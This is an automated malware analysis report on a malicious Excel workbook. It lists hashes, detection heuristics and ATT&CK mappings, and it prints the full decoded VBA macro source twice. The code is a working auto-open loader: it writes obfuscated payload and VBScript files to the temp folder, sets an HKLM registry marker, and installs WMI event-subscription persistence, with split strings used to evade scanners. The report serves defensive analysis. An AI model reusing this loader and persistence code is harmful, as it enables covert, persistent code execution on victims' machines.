Office (OLE) malware analysis — malicious · 29824741eb9e14a8

MALICIOUS

Office (OLE)

152.5 KB Created: 2018-10-31 08:57:54 First seen: 2019-05-16

MD5: fff193eae10c56287ce050525da54dd5 SHA-1: ba74a3c05e5efe165e24fa7c2c6f185f33671142 SHA-256: 29824741eb9e14a8a38ec556832e2f9fc76928844fdeb11062097f08da2005df

496 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The Workbook_Open macro executes a Shell command to run a dynamically created VBScript file. This VBScript file then reads and executes content from a temporary file named 'DM6331.TMP', which is populated with obfuscated data from the spreadsheet. The script also attempts to write to the registry key HKLM\SOFTWARE\Microsoft\rknrl\wspr, likely for persistence or tracking. This indicates a downloader functionality, where the macro serves as the initial execution vector for a second-stage payload.

Heuristics 12

ClamAV: Xls.Downloader.Generic-6923172-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Generic-6923172-0
VBA macros detected medium 9 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
  Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
End Sub
```

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

  txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """
  txt = txt & DM & """:Set objFile = Fso.CreateTextFile(dir&""DM6331.TMP"",True,False):objFile.write DMtxt:objFile.close:VBStxt = """

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA
Matched line in script
```
  Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
End Sub
```
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
  vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

  vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

  Const HKEY_LOCAL_MACHINE = &H80000002
  Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  oReg.GetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", strValue

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Workbook_Open()
  On Error Resume Next

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
  Dim gPath As String, str As String
  gPath = Environ("TEMP")
  ChDrive "C"
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6478 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6478 bytes
SHA-256: `1e0c489e8d57642c80c72f80fff37fe6c3b9984a83e8837cb7ff9489c6719fed`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() On Error Resume Next Dim gPath As String, str As String gPath = Environ("TEMP") ChDrive "C" ChDir gPath For i = 1 To 180 dmStr = dmStr & Sheets(" ").Range("z" & i).Text Next DMpath = gPath & "\DM6331.TMP" VBSpath = gPath & "\rknrl.vbs" Open DMpath For Output As #1 Print #1, dmStr Close #1 vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)" Open VBSpath For Output As #2 Print #2, vbsStr Close #2 wmiserv dmStr, vbsStr 'Application.Wait (Now + TimeValue("0:00:02")) Const HKEY_LOCAL_MACHINE = &H80000002 Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv") oReg.GetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", strValue If strValue = "" Then oReg.SetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", "E" & Month(Now()) & "-" & Day(Now()) End If Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34) End Sub Function wmiserv(DM, VBS) On Error Resume Next Dim objConn As Object, nslink As String nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption" Set objConn = GetObject(nslink) DM = Replace(DM, """", """""") VBS = Replace(VBS, """", """""") txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """ txt = txt & DM & """:Set objFile = Fso.CreateTextFile(dir&""DM6331.TMP"",True,False):objFile.write DMtxt:objFile.close:VBStxt = """ txt = txt & VBS & """:Set objFile = Fso.CreateTextFile(dir&""rknrl.vbs"",True,False):objFile.write VBStxt:objFile.close:WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr""):if wspr = """" then:WShell.regwrite ""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr"", ""E""&Month(now())&""-""&Day(now()), ""REG_SZ"":end if" WmiConsumer objConn, txt, "rknrl" End Function Function WmiConsumer(objConn, txt, consumer) On Error Resume Next dn = "rknrl" runinterval = 1500 stxt = txt Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_ asec.Name = consumer & "_consumer" asec.scriptingengine = "vbscript" asec.ScriptText = stxt Set asecpath = asec.put_ Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_ itimer.timerid = dn & "_itimer" itimer.intervalbetweenevents = runinterval itimer.skipifpassed = False itimer.put_ Set evtflt = objConn.Get("__EventFilter").spawninstance_ evtflt.Name = dn & "_filter" evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer""" evtflt.querylanguage = "wql" Set fltpath = evtflt.put_ Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_ fcbnd.consumer = asecpath.Path fcbnd.Filter = fltpath.Path fcbnd.put_ End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() Dim gPath As String, str As String gPath = Environ("TEMP") For i = 1 To 100 str = str & Sheets("test").Range("z" & i).Text Next 'str = "msgbox ""ssfff""" Open gPath & "\DM6331.TMP" For Output As #1 Print #1, str Close #1 Open gPath & "\zz123.vbs" For Output As #2 Print #2, Sheets("test").Range("a1").Text Close #2 Shell "wscript.exe " & """" & gPath & "\zz123.vbs" & """" End Sub Function wmiserv() Dim objConn As Object, nslink As String nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption" Set objConn = GetObject(nslink) txt = "ttttt" WmiConsumer objConn, txt, "rknrl" End Function Function WmiConsumer(objConn, txt, consumer) On Error Resume Next dn = "rknrl" runinterval = 10000 stxt = txt Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_ asec.Name = consumer & "_consumer" asec.scriptingengine = "vbscript" asec.ScriptText = stxt Set asecpath = asec.put_ Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_ itimer.timerid = dn & "_itimer" itimer.intervalbetweenevents = runinterval itimer.skipifpassed = False itimer.put_ Set evtflt = objConn.Get("__EventFilter").spawninstance_ evtflt.Name = dn & "_filter" evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer""" evtflt.querylanguage = "wql" Set fltpath = evtflt.put_ Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_ fcbnd.consumer = asecpath.Path fcbnd.Filter = fltpath.Path fcbnd.put_ End Function

SHA-256: 1e0c489e8d57642c80c72f80fff37fe6c3b9984a83e8837cb7ff9489c6719fed

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
  On Error Resume Next
  Dim gPath As String, str As String
  gPath = Environ("TEMP")
  ChDrive "C"
  ChDir gPath
  For i = 1 To 180
    dmStr = dmStr & Sheets(" ").Range("z" & i).Text
  Next
  
  DMpath = gPath & "\DM6331.TMP"
  VBSpath = gPath & "\rknrl.vbs"
  
  Open DMpath For Output As #1
  Print #1, dmStr
  Close #1
  
  vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
  
  Open VBSpath For Output As #2
  Print #2, vbsStr
  Close #2
  
  wmiserv dmStr, vbsStr
  'Application.Wait (Now + TimeValue("0:00:02"))
  
  Const HKEY_LOCAL_MACHINE = &H80000002
  Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  oReg.GetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", strValue

  If strValue = "" Then
    oReg.SetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", "E" & Month(Now()) & "-" & Day(Now())
  End If
  

  Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
End Sub

Function wmiserv(DM, VBS)
  On Error Resume Next
  Dim objConn As Object, nslink As String
  nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption"
  Set objConn = GetObject(nslink)
  
  DM = Replace(DM, """", """""")
  VBS = Replace(VBS, """", """""")
  
  txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """
  txt = txt & DM & """:Set objFile = Fso.CreateTextFile(dir&""DM6331.TMP"",True,False):objFile.write DMtxt:objFile.close:VBStxt = """
  txt = txt & VBS & """:Set objFile = Fso.CreateTextFile(dir&""rknrl.vbs"",True,False):objFile.write VBStxt:objFile.close:WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr""):if wspr = """" then:WShell.regwrite ""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr"", ""E""&Month(now())&""-""&Day(now()), ""REG_SZ"":end if"

  WmiConsumer objConn, txt, "rknrl"

End Function

Function WmiConsumer(objConn, txt, consumer)
  On Error Resume Next
  dn = "rknrl"
  runinterval = 1500
  stxt = txt
  Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_
  asec.Name = consumer & "_consumer"
  asec.scriptingengine = "vbscript"
  asec.ScriptText = stxt
  Set asecpath = asec.put_
  Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_
  itimer.timerid = dn & "_itimer"
  itimer.intervalbetweenevents = runinterval
  itimer.skipifpassed = False
  itimer.put_
  Set evtflt = objConn.Get("__EventFilter").spawninstance_
  evtflt.Name = dn & "_filter"
  evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer"""
  evtflt.querylanguage = "wql"
  Set fltpath = evtflt.put_
  Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_
  fcbnd.consumer = asecpath.Path
  fcbnd.Filter = fltpath.Path
  fcbnd.put_
End Function




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
  Dim gPath As String, str As String
  gPath = Environ("TEMP")

  For i = 1 To 100
     str = str & Sheets("test").Range("z" & i).Text
  Next
  
  'str = "msgbox ""ssfff"""
  
  Open gPath & "\DM6331.TMP" For Output As #1
  Print #1, str
  Close #1
  
  Open gPath & "\zz123.vbs" For Output As #2
  Print #2, Sheets("test").Range("a1").Text
  Close #2
  
  
  
  Shell "wscript.exe " & """" & gPath & "\zz123.vbs" & """"
  

End Sub
Function wmiserv()
Dim objConn As Object, nslink As String
nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption"
Set objConn = GetObject(nslink)
txt = "ttttt"
WmiConsumer objConn, txt, "rknrl"
End Function

Function WmiConsumer(objConn, txt, consumer)
On Error Resume Next
dn = "rknrl"
runinterval = 10000
stxt = txt
Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_
asec.Name = consumer & "_consumer"
asec.scriptingengine = "vbscript"
asec.ScriptText = stxt
Set asecpath = asec.put_
Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_
itimer.timerid = dn & "_itimer"
itimer.intervalbetweenevents = runinterval
itimer.skipifpassed = False
itimer.put_
Set evtflt = objConn.Get("__EventFilter").spawninstance_
evtflt.Name = dn & "_filter"
evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer"""
evtflt.querylanguage = "wql"
Set fltpath = evtflt.put_
Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_
fcbnd.consumer = asecpath.Path
fcbnd.Filter = fltpath.Path
fcbnd.put_
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.